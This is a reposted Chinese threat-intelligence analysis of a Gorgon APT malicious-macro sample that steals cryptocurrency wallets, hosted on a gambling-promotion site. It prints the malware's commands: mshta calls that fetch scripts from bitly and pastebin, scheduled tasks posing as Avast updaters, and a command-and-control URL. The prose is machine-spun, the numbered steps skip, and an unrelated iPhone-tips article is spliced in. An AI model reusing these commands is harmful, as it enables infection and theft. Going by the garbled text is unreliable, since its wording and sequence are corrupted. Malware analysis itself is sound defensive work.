后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

申博_新闻事件 申博 73次浏览 已收录 0个评论

背景

Gorgon APT构造是一个被以为来自巴基斯坦的进击构造,该构造在2018年8月份由Palo Alto Unit42团队举行表露,重要针对环球外贸人士举行进击。除此之外,平安研究职员还发明Gorgon针对英国、西班牙、俄罗斯、美国等政府目的发起了进击,算是APT构造的后起之秀,近来一年异常活泼。

近日,深佩服平安团队发明了Gorgon APT构造最新变种样本,此样本释放了一个偷取受害者假造币钱包的木马。

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

/进击流程图/

样本剖析

1.样本中包括歹意的宏代码,以下所示:

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

2.经由过程动态调试,宏代码挪用mshta.exe实行mshta http://bitly.com/6xdfsSXsh6,接见短链接网址http://bitly.com/6xdfsSXsh6,以下所示:

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

7.挪用cmd.exe顺序,实行以下敕令,完毕相干历程:

"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit

8.将以下敕令,写入自启动注册表项:

mshta.exe http://pastebin.com/raw/hJjQuQv1

9.经由过程敕令,建立两个设计任务启动项Avast Updater和Avast backup,以下所示:

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exe http://pastebin.com/raw/BrH6UFRc" /F
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Avast backup" /tr "mshta.exe http://pastebin.com/raw/nhcP3XgH" /F

10.上面三个自启动项,离别实行三个差别的剧本,以下所示:

· http://pastebin.com/raw/hJjQuQv1

· http://pastebin.com/raw/BrH6UFRc

· http://pastebin.com/raw/nhcP3XgH

hJjQuQv1剧本解密以后,以下所示:

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

BrH6UFRc剧本解密以后,以下所示:

再次解密剧本,以下所示:

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

11.下载https://pastebin.com/raw/dkrjWec2剧本并实行,剧本内容,以下所示:

世界上没有相对平安的手机,庇护iPhone平安的七个提醒

众所周知,iPhone以安全而闻名。正是因为它实在是太安全了,所以FBI一直对苹果公司特别关注。不过,不管怎样,iPhone也并不是无懈可击的,世界上没有绝对安全的手机。 虽然Apple的硬件变得越来越安全,但如果你有一些不良的网络安全习惯,那么您的iPhone也一样会受到攻击。本文将为您提供以下七个安全提示,帮助您确保iPhone的安全。 1.使用长密码 很多人为了保护手机都会设置一个四位数的密码,或者是更安全的六位数密码。这种方法不是不可行,但是如果小

13.替代以后,是一个PE文件,以下所示:

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

14.经由过程检察这个PE文件为NET编写的注入顺序,以下所示:

15.将PE顺序注入到calc.exe历程中,下载https://pastebin.com/raw/j8mRken0剧本内容,然后替代内里的@!并实行,剧本内容,以下所示:

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

16.解密剧本以后也是一个PE文件,以下所示:

21.偷取受害者浏览器历史纪录信息等,以下所示:

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

22.长途服务器URL:http://216.170.126.139/Panel/10/index.php,捕获到的数据包流量,以下所示:

23.nhcP3XgH剧本解密以后,以下所示:

后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包

平安发起

不论进击者的入侵设计是何等的周密,总会因为手艺的限定留下些许千丝万缕,比如软件的植入、收集流量的发生,这些陈迹能够并不足以作为APT进击的证据,但一旦发明,就必须进步小心,并实时的保留现场,关照平安相干职员,对疑似感染的主机举行断绝和搜检。同时也要注重一样平常提防措施,在思想上和手艺上左右开弓:

1、增强职员平安提防认识。不要翻开来历不明的邮件附件,关于邮件附件中的文件要郑重运转,如发明剧本或其他可实行文件可先运用杀毒软件举行扫描;

2、晋级office系列软件到最新版本,不要随便运转不可信文档中的宏;

3、布置分层掌握,完成深度收集平安防备,构建端到端的平面平安防护收集。在收集计划时须要充分考虑终端接入平安、内网平安防护、运用体系平安等多个维度,并依据差别的营业需乞降平安品级举行合理的分区断绝;

4、注重收集数据、体系运转状况的审计和剖析。严厉把控体系的接见权限,延续对数据流的收支举行有用的监控,实时更新平安补丁,定时举行平安设置基线的审阅和体系平安风险的评价,实时发明能够行动并经由过程通信线路加密、运用层平安扫描与防护、断绝等有用手艺手段将能够的平安风险抹杀在摇篮里。

原文地点: https://www.4hou.com/encrypted/20357.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明后起之秀:Gorgon APT黑客构造觊觎假造钱银钱包
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址